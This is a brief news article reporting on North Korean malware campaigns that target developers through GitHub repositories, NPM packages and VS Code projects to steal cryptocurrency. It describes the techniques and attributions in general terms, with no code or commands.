Ethical Hacking News
A new wave of sophisticated malware attacks, linked to North Korea, has been detected on GitHub and NPM. The Contagious Interview group is behind these attacks, which use developer tools to steal cryptocurrency and other sensitive data. With over $12 million in stolen value so far this year, the stakes have never been higher.
The Contagious Interview group, a North Korean hacking collective, has been linked to recent malware attacks. The attackers use developer tools like GitHub and NPM to exploit developers and steal cryptocurrency. The group uses Microsoft Visual Studio Code projects with a "runOn: folderOpen" technique to execute malicious code without user interaction. These attacks target financial institutions, educational organizations, and the general public, particularly those interested in cryptocurrency. North Korean hackers are using generative artificial intelligence to create sophisticated malware loaders that can evade detection. The total value of cryptocurrency stolen from developers and users stands at over $12 million in the first three months of 2026.
In recent months, cybersecurity researchers have been warning about an unprecedented wave of sophisticated malware attacks emanating from North Korea. These attacks, which involve the exploitation of developer tools like GitHub and NPM, pose a significant threat to individuals and organizations worldwide.
The Contagious Interview group, a North Korean hacking collective known for its persistence in targeting financial institutions, cryptocurrency exchanges, and educational organizations, has been linked to these recent attacks. Their modus operandi involves luring unsuspecting developers into installing malware-laced GitHub repositories or NPM packages, often disguised as legitimate software development tools.
According to Proofpoint, a cybersecurity firm that specializes in threat intelligence, the Contagious Interview group has been using Microsoft Visual Studio Code (VS Code) projects with a specific technique called "runOn: folderOpen" to execute malicious code every time the code editor is opened. This approach allows the attackers to bypass traditional security measures without requiring any user interaction.
These attacks are not limited to individual organizations; they also target the general public, particularly those interested in cryptocurrency and blockchain technology. In one instance, a malicious NPM package was used to steal information from Telegram users, while another attack targeted developers running Polymarket trading bots to carry out system fingerprinting and SSH backdoor installation.
The use of generative artificial intelligence by North Korean hackers has also been observed. This technology is being employed to create sophisticated malware loaders that can evade detection by traditional security measures. Furthermore, the attackers are using fake LinkedIn accounts and job postings to lure victims into installing malicious software.
The total value of cryptocurrency stolen from developers and users as a result of these attacks stands at over $12 million in the first three months of 2026 alone.
The attack campaigns linked to North Korea have been attributed to various groups, including BlueNoroff (also known as Sapphire Sleet and UNC1069), Contagious Interview, and the Lazarus Group. These groups are responsible for a range of high-profile attacks, from supply chain vulnerabilities to phishing scams.
Recent research by Yeeth Security has identified three malicious VS Code extensions that are disguised as legitimate productivity tools but actually contain sophisticated backdoors. The attackers have been using these extensions to gain access to developer systems and turn their code contributions into infection vectors for downstream developers.
As cybersecurity researchers continue to track the evolution of North Korean malware attacks, it is essential to recognize the importance of staying informed about emerging threats. These attacks highlight the need for increased vigilance and robust security measures in the face of sophisticated cyber threats.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Sophisticated-Threat-Landscape-North-Koreas-Escalating-Malware-Attacks-on-GitHub-and-NPM-ehn.shtml
https://thehackernews.com/2026/06/north-korean-hackers-are-turning.html
Published: Thu Jun 18 00:22:38 2026 by llama3.2 3B Q4_K_M
